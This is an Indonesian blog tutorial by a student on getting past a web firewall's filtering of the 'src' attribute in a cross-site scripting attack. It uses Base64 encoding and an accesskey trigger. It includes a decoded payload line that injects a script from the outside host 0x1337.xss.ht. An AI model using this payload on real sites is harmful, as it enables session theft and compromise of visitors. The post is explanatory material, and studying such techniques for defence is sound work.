Hai, Saya Abdi Prawira Negara. duduk di bangku sekolah kelas 2 SMK Jurusan Otomotif tetapi tertarik pada dunia IT Sec.

Bypassing Source Element Dalam Melakukan XSS

Hasil gambar untuk xss meme

Apa sih XSS itu ? Yap Cross Site Scripting, lebih tepatnya teknik penginjeksian atau bisa dibilang (Code Injection Attack) yang bertujuan menginput kode berbahaya seperti javascript yang sudah dibuat untuk menjadi Logger atau pun HTML biasa untuk redirect ke halaman phising dan lainnya.
  
            Kenapa Cross-Site Scripting disingkat menjadi XSS tidak CSS ? Karna CSS sudah digunakan untuk Cascade Stylesheet atau sebuah tag yang di gunakan dalam dunia Frontend.

Ke inti masalah, ketika mendapati sebuah situs yang VULN terhadap serangan XSS dalam parameter vuln.com/search.php?s= ketika menginjeksikan basic XSS Payload dengan element SRC dan terblock oleh WAF (Website Application Firewall).

Basic Payload yang di injeksikan




WAF tersebut sudah memfilter element src (source) pada javascript yang di inputkan, jadi saya disini meng-encode / enkripsikan payload dengan BASE64 dan menggunakan element accesskey, Jadi kita cukup mentrigger XSS tersebut dengan cara menekan tombol Alt + Shift + X.

Encoded Payload

Decoded Payload

var a=document.createElement("script");a.src="https://0x1337.xss.ht";document.body.appendChild(a);

Untuk lebih jelasnya bisa menyimak video berikut ini